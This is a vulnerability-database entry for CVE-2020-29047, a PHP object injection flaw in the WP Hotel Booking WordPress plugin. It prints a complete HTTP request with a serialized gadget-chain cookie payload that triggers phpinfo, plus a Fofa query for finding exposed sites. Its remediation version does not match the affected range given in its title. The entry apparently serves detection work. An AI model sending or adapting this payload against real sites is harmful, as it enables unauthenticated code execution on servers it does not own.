🔙 목록으로 돌아가기

CVE-2020-29047: WP Hotel Booking < 1.10.4 - PHP Object Injection

TitleWP Hotel Booking < 1.10.4 - PHP Object Injection
AuthorDhiyaneshDk
SeverityCritical
ImpactUnauthenticated attackers can exploit PHP object injection to execute arbitrary code, leading to complete server compromise.
RemediationUpgrade to WP Hotel Booking version 1.10.3 or later.
CVSS Score9.8
EPSS Score0.8462
CVE IDCVE-2020-29047
CWE IDCWE-502
Fofa Querybody="wp-content/plugins/wp-hotel-booking"
Tags cve cve2020 wordpress wp-plugin wp wp-hotel-booking rce thimpress vkev vuln

🔍 Vulnerability Description

The wp-hotel-booking plugin through 1.10.2 for WordPress allows remote attackers to execute arbitrary code because of an unserialize operation on the thimpress_hotel_booking_1 cookie in load in includes/class-wphb-sessions.php.

🌐 HTTP Request

GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Connection: close
Cookie: thimpress_hotel_booking_1=O:11:"WPHB_Logger":1:{s:21:"%00WPHB_Logger%00_handles"%3BC:33:"Requests_Utility_FilteredIterator":67:{x:i:0%3Ba:1:{i:0%3Bs:2:"-1"%3B}%3Bm:a:1:{s:11:"%00*%00callback"%3Bs:7:"phpinfo"%3B}}}
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2020/CVE-2020-29047.yaml

🦈 Packet Capture: ⬇️ Download cve-2020-29047.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A